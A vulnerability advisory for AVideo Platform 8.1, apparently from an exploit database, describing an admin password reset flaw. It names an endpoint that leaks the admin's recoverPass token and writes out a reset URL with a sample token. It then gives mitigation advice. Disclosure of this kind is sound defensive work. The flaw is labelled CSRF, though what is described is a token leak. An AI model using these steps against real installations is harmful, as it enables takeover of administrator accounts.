Vendor: AVideo Platform
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
Vulnerability Type: Cross-Site Request Forgery (CSRF)
CWE: 352
Product Name: AVideo Platform
Affected Version From: 8.1
Affected Version To: 8.1
Patch Exists: NO
Related CWE: N/A
CPE: avideo:avideo_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
Year: 2020
AVideo Platform 8.1 – Cross Site Request Forgery (Password Reset)
AVideo Platform 8.1 is vulnerable to Cross-Site Request Forgery (CSRF), which allows an attacker to reset the password of an admin user. An attacker can send a malicious request to the vulnerable endpoint objects/playlistsFromUser.json.php?users_id=[ID], whose response includes the recoverPass parameter of the admin user. The attacker can then use that recoverPass value to reset the admin user's password through the endpoint recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf.
Mitigation:
The application should implement a CSRF protection mechanism (for example, a per-session anti-CSRF token that is validated on every state-changing request) so that forged requests are rejected, and it should not expose the recoverPass value of other users in responses such as the playlists endpoint described above.